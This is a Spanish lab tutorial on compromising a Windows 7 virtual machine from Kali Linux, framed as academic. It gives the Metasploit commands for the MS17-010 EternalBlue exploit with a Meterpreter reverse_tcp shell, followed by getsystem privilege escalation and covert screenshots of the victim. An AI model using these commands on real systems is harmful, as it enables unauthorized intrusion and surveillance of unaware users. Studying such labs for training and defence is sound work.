Está en la página 1de 16

Contenido

Lo que necesitaremos ................................................................................................................................................... 2

Verificamos el Windows 7 que atacaremos .......................................................................................................... 4

Ver versión de Windows .......................................................................................................................................... 4

Ver la IP en Windows ................................................................................................................................................ 5

Empezamos con el ciberataque................................................................................................................................. 6

Paso 1: Iniciamos Kali Linux .................................................................................................................................... 6

Paso 2: Ver la IP en Kali Linux ................................................................................................................................ 6

Paso 2: Usamos NMAP ............................................................................................................................................. 7

Paso 3: Reporte completo con NMAP del host vulnerable ........................................................................ 8

Paso 4: Usamos Metasploit ..................................................................................................................................... 9

Paso 5: Usando módulo AUXILIARY de Metasploit .................................................................................... 11

Paso 6: Usando módulo EXPLOIT de Metasploit ......................................................................................... 11

Paso 7: Usando PAYLOAD de Metasploit ....................................................................................................... 12

Paso 8: Tomando el control de Windows 7 ................................................................................................... 13

Página | 1
Vulneración de Windows 7
con Kali Linux
Con este manual, podrás realizar paso a paso un ciberataque al sistema operativo Windows 7,
teniendo acceso a su Red y sabiendo solamente su IP. Para evidenciar que no existe sistema
seguro. (Todos los conceptos y comandos fueron recopilados de internet)

Una vulneración de seguridad es cualquier incidente que dé lugar al acceso no autorizado a datos,
aplicaciones, redes o dispositivos informáticos. Esto da lugar al acceso no autorizado a la
información. Por lo general, ocurre cuando un intruso logra burlar los mecanismos de seguridad.

Fuente: https://latam.kaspersky.com/resource-center/threats/what-is-a-security-breach

Nota: El presente material es para fines académicos y para conocimiento general sobre
ciberseguridad, el mismo no debe usarse para perjudicar a otras personas u organizaciones, su
uso indebido puede incurrir en sanciones de acuerdo a ley.

Lo que necesitaremos
Para empezar con la práctica, se necesitará tener los dos sistemas operativos:

Para usar las mismas versiones usadas en el manual, se adjunta links de descarga (Se puede
experimentar con cualquier versión)

Windows 7: Es el Sistema Operativo que la compañía Microsoft lanzó después de Windows


Vista en 2006. [Link de descarga:
https://drive.google.com/file/d/1ZahoZlAnxCUXOHBaKif7ZPXtmL4qRNgM/view?usp=sharing]

Kali Linux: Es una distribución basada en Debian GNU/Linux diseñada principalmente para la
auditoría y seguridad informática en general. [Link de descarga:
https://drive.google.com/file/d/1GdUlPkMQcCwo3nQURrabJx9BfapQsgkB/view?usp=sharing]

[Cómo instalar Kali Linux: https://youtu.be/aXY6bk1jQD4?t=7463]

Se recomienda para la práctica tener los sistemas operativos virtualizados, para esto se puede
usar VirtualBox o VmWare. . [Link de descarga:
https://drive.google.com/file/d/18hnH0u0mtEFhCSBxnQLa1EQwOKcQBKaw/view?usp=sharing]

Página | 2
Página | 3
Verificamos el Windows 7 que atacaremos
Ver versión de Windows
Ir a Inicio y hacer click derecho a Equipo

En este caso es Windows 7 Home Basic de 64 bits. (Este manual debería funcionar para cualquier
versión de Windows 7)

Página | 4
Ver la IP en Windows
Esta vez abriremos CMD para ver la IP

1. Ctrl+R (Se abre Ejecutar)


2. Escribir cmd, presionar Aceptar
3. Usar el comando ipconfig

Buscamos donde diga Dirección IPv4, en este caso sale 192.168.48.137

Para realizar el ciberataque no es necesario tener acceso a la máquina de Windows 7. Puesto


que es el objetivo tener acceso sin que se de cuenta el usuario del Sistema Operativo. Solo
veremos estos datos (la versión y la IP) para luego compararlos con los que hallaremos con las
herramientas de Kali Linux

Página | 5
Empezamos con el ciberataque
Paso 1: Iniciamos Kali Linux
Después de instalarlo, podemos empezar a probarlo.

Si es la primera vez que lo instalamos, nos pedirá un nombre de acceso (por defecto root) y una
contraseña, que es lo que pusimos al momento de instalar.

Paso 2: Ver la IP en Kali Linux


Al igual que en Windows 7, usaremos una terminal.

En este caso usaremos el comando ifconfig

Página | 6
Comprobamos que la IP asignada a la máquina donde corre Kali Linux es en este caso:
192.168.48.135

Notamos que en Windows era 192.168.48.137. Por lo tanto, pertenecen a la misma red
192.168.48.0. Para que funcione este ciberataque es necesario que Kali Linux este en la misma
red que el Windows 7

Paso 2: Usamos NMAP

Network Mapper Nmap (de Network Mapper) es una utilidad de software


libre para explorar, administrar y auditar la seguridad de redes de
ordenadores. Detecta hosts online, sus puertos abiertos, servicios y
aplicaciones corriendo en ellos, su sistema operativo, que firwalls/filtros
corren en una red y de qué tipo son

Fuente: https://es.slideshare.net/luispinilla96/que-es-y-como-usar-nmap

Página | 7
Para usarlo simplemente anotamos nmap en la consola.

Para escanear acompañaremos la IP de la red que identificamos. (En mi caso 192.168.48.0)

Usamos el símbolo * para que identifique a todos los hosts pertenecientes a la red.

Nos damos cuenta que además de otras IPs, identificó una que previamente ya habíamos
comprobado, la IP de Windows 7.

Lo cual nos comprueba que no necesitamos tener acceso a la máquina con Windows para poder
saber la IP que tiene. Además, si vemos más abajo vemos un resumen de reporte que nos
muestra algunos puertos abiertos, los cuales iremos explotando más adelante.

Paso 3: Reporte completo con NMAP del host vulnerable


Esta vez usaremos NMAP, para escanear específicamente el host vulnerable (el que tiene
instalado Windows 7, en mi caso 192.168.48.137). Además, aumentaremos un par de
parámetros:

Página | 8
- sV: Sondea los puertos abiertos, para obtener información de servicio/versión
- A: (de Agresivo) Habilita la detección de SO y de versión

Fuente: https://nmap.org/man/es/man-briefoptions.html

Una vez ejecutado el comando, nos mostrará un reporte más completo. Notamos que ahora nos
muestra la versión exacta del Windows 7 (Home Basic 7601 Service Pack 1), y que es el mismo
que comprobamos al principio.

Paso 4: Usamos Metasploit


MetaSploit es una suite o conjunto de programas en realidad. Está diseñada para
explotar las vulnerabilidades de los equipos y es sin duda el programa más usado por
los mejores hackers del mundo. Dentro de MetaSploit, disponemos de multitud de
herramientas y programas para ejecutar en las diferentes vulnerabilidades de cada
equipo, a cada una de estas aplicaciones se le llama sploit.

FUENTE: http://www.cursodehackers.com/metasploit.html

Para usar esta herramienta, simplemente ejecutamos el comando msfconsole

Página | 9
La consola estará lista para ser usada con Metasploit.

El Framework Metasploit se compone de módulos. Los módulos pueden ser de varios tipos:

AUXILIARY: Un Auxiliary es un programa que permite obtener información sobre el objetivo con el
fin de determinar posibles vulnerabilidades que le puedan afectar, este tipo de programas son útiles
para establecer una estrategia de ataque sobre un sistema objetivo, o el caso de un responsable de
seguridad, definir medidas defensivas que permitan mitigar amenazas sobre un sistema vulnerable.
También permite definir una serie de exploits que son lanzados contra el objetivo con el fin de
probar si alguno de ellos puede comprometer el objetivo y conseguir ejecutar un payload dado.

EXPLOIT: Un exploit es un programa que explota una o varias vulnerabilidades en un software


determinado, frecuentemente es utilizado para ganar acceso a un sistema y tener un nivel de control
sobre él.

PAYLOAD: Un Payload, es un programa que acompaña a un exploit para realizar funciones


específicas una vez el sistema objetivo es comprometido, la elección de un buen payload es una
decisión muy importante a la hora de aprovechar y mantener el nivel de acceso obtenido en un
sistema. En muchos sistemas existen firewalls, Antivirus y sistemas de detección de intrusos que
pueden dificultar la actividad de algunos payloads, por este motivo se suelen utilizar encoders para
intentar evadir cualquier AV o Firewall.

FUENTE: https://thehackerway.com/2011/03/11/comandos-y-conceptos-basicos-metasploit-
framework/

Página | 10
Paso 5: Usando módulo AUXILIARY de Metasploit
Antes de realizar el ataque, verificaremos que el SO de Microsoft es VULNERABLE.

Usaremos el siguiente comando: use auxiliary/scanner/smb/smb_ms17_010

Seguido, asignaremos a una variable la IP del host que queremos verificar su vulnerabilidad:

set RHOSTS 192.168.48.137 (ip vulnerable)

Finalmente ejecutamos el comando exploit

Nos mostrará si el host es o no VULNERABLE. Si nos sale ese mensaje, significa que se
puede continuar con el ataque

Paso 6: Usando módulo EXPLOIT de Metasploit


Para usar EXPLOIT ejecutaremos el siguiente comando:

use exploit/windows/smb/ms17_010_eternalblue

Página | 11
Seguido, asignaremos a una variable la IP del host vulnerable

set RHOSTS 192.168.48.137 (Si estas usando Kali 2018 seria RHOST, sin la S)

Paso 7: Usando PAYLOAD de Metasploit


Para usar PAYLOAD ejecutamos lo siguiente:

set payload windows/x64/meterpreter/reverse_tcp

Aprovecharemos los puertos abiertos TCP.

Seguido, asignaremos a una variable la IP del host atacante (En este caso la IP que se asignó a la
maquina Kali Linux, 192.168.48.135)

set lhost 192.168.48.135

Finalmente ejecutamos el comando exploit para efectuar la vulneración

Nos indica que ya esta establecida la conexión para la explotación.

Página | 12
Paso 8: Tomando el control de Windows 7
Una vez efectuado la práctica con éxito, podemos realizar varias pruebas.

Podemos usar sessions para interactuar y manipular con las distintas sesiones creadas a través
de los exploits mientras se hace la vulneración

Con getsystem – Podemos elevar los permisos de acceso a nivel de sistema.

Podemos usar help, para ver todas las opciones disponibles.

Un ejemplo de los comandos, es screenshot. Que te permite tomar una captura de pantalla en
tiempo real de lo que ocurre dentro del Windows 7

Página | 13
Vamos a probar si realmente funciona.

Nos vamos a Windows 7 y editamos algún documento.

Página | 14
Volvemos a ejecutar screenshot en Kali Linux

Nos vamos al directorio

Y comprobamos que tenemos acceso al SO de Microsoft, y que el usuario no tiene ningun aviso
que su máquina con Windows 7 fue vulnerado

Página | 15

También podría gustarte